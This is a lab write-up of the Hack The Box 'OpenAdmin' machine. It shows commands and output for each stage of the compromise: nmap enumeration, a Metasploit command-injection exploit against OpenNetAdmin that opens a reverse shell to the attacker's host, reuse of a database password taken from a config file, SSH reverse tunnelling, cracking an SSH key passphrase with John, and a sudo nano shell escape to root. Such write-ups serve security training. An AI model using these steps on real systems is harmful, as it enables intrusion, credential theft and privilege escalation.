Redhalo

hack the box walkthrough – OpenAdmin machine

New Linux HTB machine today, OpenAdmin!

The difficulty is easy but I have to admit I spent a bit more time than other machines for this one.

Let’s Jump in!

Enumeration

As usual we start with our enumeration process with nmapautomator:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.19 Full
Running a Full scan on 10.129.79.19
Host is likely running Linux

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 11:51 EST
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.03s elapsed
Initiating Connect Scan at 11:51
Scanning 10.129.79.19 [65535 ports]
Discovered open port 80/tcp on 10.129.79.19
Discovered open port 22/tcp on 10.129.79.19
Warning: 10.129.79.19 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.32% done; ETC: 11:53 (0:01:48 remaining)
Connect Scan Timing: About 44.97% done; ETC: 11:53 (0:01:15 remaining)
Connect Scan Timing: About 67.00% done; ETC: 11:53 (0:00:45 remaining)
Completed Connect Scan at 11:53, 136.51s elapsed (65535 total ports)
Nmap scan report for 10.129.79.19
Host is up (0.055s latency).
Not shown: 64776 closed ports, 757 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.59 seconds

Making a script scan on all ports
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 11:53 EST
Nmap scan report for 10.129.79.19
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

---------------------Finished all Nmap scans---------------------
 Completed in 2 minute(s) and 25 second(s)

I found 2 ports opened: the port 22 and 80.

Looking at the port 80 I had the default Apache2 page:

A dirbuster scan showed me some static website folder and an interresting folder called ona:

It’s actually the OpenNetAdmin login page:

I had the information about the version used: 18.1.1

A quick look at searchsploit:

Looks promising ๐Ÿ˜€

I have configured the metasploit exploit like following:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options

Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /ona/login.php   yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set rhosts 10.129.71.82
rhosts => 10.129.71.82
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set lhost tun0
lhost => 10.10.14.102
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.102:4444 
[*] Exploiting...
[*] Sending stage (38 bytes) to 10.129.71.82
[*] Command shell session 1 opened (10.10.14.102:4444 -> 10.129.71.82:57144) at 2021-01-13 15:13:21 -0500
[*] Command Stager progress - 100.00% done (808/808 bytes)

whoami
www-data

foothold

While looking at files I have access to, I found the file database_settings.inc.php which contains a db password

[email protected]:/opt/ona/www/local/config$ cat dat
cat database_settings.inc.php 
 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

After few minutes spent looking at the content of the DB, it seems like a rabbit hole – nothing interresting was there.

So I tried to connect with one of the account available on the server:

[email protected]:/opt/ona/www$ cd /home
lscd /home
 [email protected]:/home$ -al
ls -al
total 16
drwxr-xr-x  4 root   root   4096 Nov 22  2019 .
drwxr-xr-x 24 root   root   4096 Nov 21  2019 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22  2019 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28  2019 joanna
[email protected]:/home$ su jimmy
su jimmy
Password: n1nj4W4rri0R!

[email protected]:/home$ 

Bingo ! we are now connected with Jimmy account.

lateral movement

Looking again at files I have access too, I have found a folder “internal” containing 3 php files:

[email protected]:/var/www/internal$ ls -al
ls -al
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23  2019 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22  2019 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23  2019 main.php

It looks a form with a login and password fields. If we have the credential it will give the id_rsa file of Joanna.

The login and password are mentioned in the index.php but the password is encoded in sha512

The password decoded is “Revealed”

The next point is to check how to reach this form.

Looking at the apache2 configuration, I understood that the site is accessible only from the locahost on port 52846:

[email protected]:/etc/apache2/sites-enabled$ ls -al
ls -al
total 8
drwxr-xr-x 2 root root 4096 Nov 22  2019 .
drwxr-xr-x 8 root root 4096 Nov 21  2019 ..
lrwxrwxrwx 1 root root   32 Nov 22  2019 internal.conf -> ../sites-available/internal.conf
lrwxrwxrwx 1 root root   33 Nov 22  2019 openadmin.conf -> ../sites-available/openadmin.conf
[email protected]:/etc/apache2/sites-enabled$ cat internal.conf
cat internal.conf
Listen 127.0.0.1:52846


    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal


AssignUserID joanna joanna


    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined


[email protected]:/etc/apache2/sites-enabled$ 

Well.. let’s go pivoting then.

I have configured my Kali machine to run my ssh server on port 4141:

[email protected]:~/Documents$ sudo systemctl status ssh
โ— ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Wed 2021-01-13 15:31:42 EST; 4s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 2234 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 2235 (sshd)
      Tasks: 1 (limit: 4622)
     Memory: 2.6M
     CGroup: /system.slice/ssh.service
             โ””โ”€2235 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jan 13 15:31:42 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jan 13 15:31:42 kali sshd[2235]: Server listening on 0.0.0.0 port 4141.
Jan 13 15:31:42 kali sshd[2235]: Server listening on :: port 4141.
Jan 13 15:31:42 kali systemd[1]: Started OpenBSD Secure Shell server.

Then from the OpenAdmin machine, I ran the following command:

[email protected]:/var/www/internal$ ssh -R 0.0.0.0:8888:127.0.0.1:52846 [email protected] -p 4141

Basically it means the OpenAdmin local port 52846 is now accessible from my kali localhost on port 8888.

From my kali machine I had access to the “internal” website and could connect using credential mentioned above:

As expected it gave me the id_rsa content of joanna.

But I had not the passphrase for key.. let’s crack it with John:

[email protected]:~/Documents$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2021-01-12 17:34) 0.2227g/s 3194Kp/s 3194Kc/s 3194KC/sa6_123..*7ยกVamos!
Session completed

Then let’s try to connect with ssh:

[email protected]:~/Documents$ ssh -i id_rsa [email protected]
load pubkey "id_rsa": invalid format
The authenticity of host '10.129.71.82 (10.129.71.82)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.71.82' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jan 13 20:45:47 UTC 2021

  System load:  0.0               Processes:             142
  Usage of /:   50.0% of 7.81GB   Users logged in:       0
  Memory usage: 21%               IP address for ens160: 10.129.71.82
  Swap usage:   0%
                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
 * Canonical Livepatch is available for installation.                                                                                                                                                                                      
   - Reduce system reboots and improve kernel security. Activate at:                                                                                                                                                                       
     https://ubuntu.com/livepatch                                                                                                                                                                                                          
                                                                                                                                                                                                                                           
41 packages can be updated.                                                                                                                                                                                                                
12 updates are security updates.


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
[email protected]:~$ 

Bingo ! we are connected

Priviliege Escalation

Typing sudo -l I had the information that joanna could run a nano on the file /opt/priv:

[email protected]:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

nano can spawn an interactive system shell with root permission as I ran it with sudo.

Just follow this procedure:

nano
Ctrl-R Ctrl-X
reset; sh 1>&0 2>&0

Then I am root: